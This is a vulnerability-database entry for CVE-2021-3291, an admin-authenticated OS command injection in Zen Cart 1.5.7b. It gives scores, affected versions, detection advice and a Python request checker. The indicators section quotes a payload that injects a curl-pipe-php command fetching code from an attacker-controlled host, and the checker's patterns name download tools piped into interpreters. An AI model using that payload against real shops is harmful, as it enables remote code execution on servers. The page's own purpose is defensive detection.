CVE-2021-3291
published 2021-01-26

CVE-2021-3291: Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.

Priority: P259 high
CVSS 3.1: 7.2 (AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H)
EXPLOIT
EPSS: 16.78% (96.6th percentile)

Affected

2 ranges
Vendor | Product | Version range | Fixed in
zen-cart | zen_cart | |
zencart | zencart | >= 0 < 1.5.7c | 1.5.7c

Detection & IOCs (extracted from sources)

version: Zen Cart 1.5.7b
url: /cracK-Fqu-trasH/
command: True','F'); echo `curl #{@adresim} |php`; //
path: index.php?cmd=login&camefrom=index.php
  • Monitor POST requests to the Zen Cart admin modules endpoint (index.php?cmd=modules&action=save) for configuration values containing SQL injection/command injection patterns such as single quotes, backticks, or shell command sequences (e.g., `curl ... |php`).
  • Detect exploitation attempts by looking for the payload pattern in POST body parameters targeting Zen Cart module configuration fields: the string pattern True','F'); echo `curl ... |php`; // is the injected OS command payload.
  • The Metasploit module uses a two-stage payload delivery: it starts a local HTTP server and injects a curl-pipe-php command into the Zen Cart database; detect outbound curl requests from the web server process to attacker-controlled infrastructure following a POST to the modules save endpoint.
  • Exploitation requires authenticated admin access; the vulnerability is only exploitable by an attacker who already holds valid admin credentials for the Zen Cart application.
  • The MODULE and SETTING options must match an installed/active Zen Cart module (e.g., payment/freecharger); the injection only fires when the affected module configuration is subsequently loaded/edited.
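
The first two monitoring notes above, written out as a check over a decoded request (method, URL, form body). This is an added example, not code from the sources this page cites; the `configuration[` field prefix, the `/admin/` path, the setting key and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, parse_qsl, urlencode, urlsplit

# Indicators named in the detection notes: quotes, backticks, shell sequences.
INDICATORS = {
    "single_quote": re.compile(r"'"),
    "backtick": re.compile(r"`"),
    "download_tool": re.compile(r"\b(?:curl|wget)\b", re.I),
    "pipe_to_interpreter": re.compile(r"\|\s*(?:php|sh|bash)\b", re.I),
}
FIELD_PREFIX = "configuration["  # assumption: how module settings are named in the form


def is_modules_save(url):
    """True for the admin endpoint index.php?cmd=modules&action=save."""
    query = parse_qs(urlsplit(url).query)
    return query.get("cmd") == ["modules"] and query.get("action") == ["save"]


def inspect_request(method, url, body):
    """Return {field: [indicator names]} for suspicious module settings."""
    if method.upper() != "POST" or not is_modules_save(url):
        return {}
    findings = {}
    for field, value in parse_qsl(body, keep_blank_values=True):
        if not field.startswith(FIELD_PREFIX):
            continue  # only module configuration values are of interest here
        hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
        if hits:
            findings[field] = hits
    return findings


# Constructed sample requests (not captured traffic); URL and key are hypothetical.
SAVE_URL = "/admin/index.php?cmd=modules&set=payment&module=freecharger&action=save"
KEY = "configuration[MODULE_PAYMENT_FREECHARGER_STATUS]"
BENIGN = urlencode({KEY: "True", "securityToken": "x"})
SUSPECT = urlencode({KEY: "True','F'); echo `curl ... |php`; //"})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_request("POST", SAVE_URL, body))
```

A lone single quote can occur in legitimate settings text, so the returned indicator list is meant for triage: a backtick or pipe-to-interpreter hit in a module setting is the stronger signal.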

CVSS provenance

nvd | v3.1 | 7.2 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C